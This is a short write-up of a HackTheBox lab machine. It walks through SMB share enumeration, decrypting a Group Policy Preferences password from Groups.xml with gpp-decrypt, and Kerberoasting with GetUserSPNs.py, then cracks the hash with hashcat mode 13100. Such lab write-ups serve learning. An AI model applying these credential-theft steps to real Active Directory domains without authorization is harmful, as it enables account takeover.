I completed this HackTheBox CTF with the aim of improving my skills on Windows targets.
Scanning and Reconnaissance:
IP/Scope: 10.10.10.100
The first step I did was to perform a nmap scan on the IP.
sudo nmap -sC -sV -vv -T4 $IP -oN nmap/active_first_scan.nmap
Using nxc smb I see the following shares:
There is a non-standard share where we have READ permission: “Replication”.
With the help of smbmap and recursive mode via smbclient, we get a full tree of the directories. Helping us to browse through the files contained.
After all the file browsing, we end up with one very interesting file called Groups.xml.
Using mget, we download and inspect the file’s content:
GPP is not the best way to deploy local accounts considering that Microsoft published the key being used to encrypt these passwords.
(Full doc article on the topic: MindPointGroup – GPP PrivEsc)
We can use various and well-known publicly available tools to decrypt the content.
I’m going to use gpp-decrypt:
gpp-decrypt $STRING
> $PLAIN_TEXT_PASSWORD
Let’s continue to see what we can obtain next now that we have this new account at our disposal.
Trying to scan again for SMB dirs, we see that now we have access to way more shares:
Inside the “Users” share we find our first flag.
Now we need to escalate our privileges to obtain the local administrator password.
More enumeration
Enumerating the AD account did not produce significant results.
As a next step, let’s check if we can play with the Kerberos service.
Using the GetUserSPNs.py, we obtain the following:
Which produce some very interesting output:
hashcat
Using the hashcat doc/man page, we see that this hash requires mode 13100:
hashcat -m 13100 hash.txt /usr/share/wordlist/rockyou.txt
Now, having the administrator plain text password. Let’s finish this CTF:
CTF completed!
Thanks for reading 🙂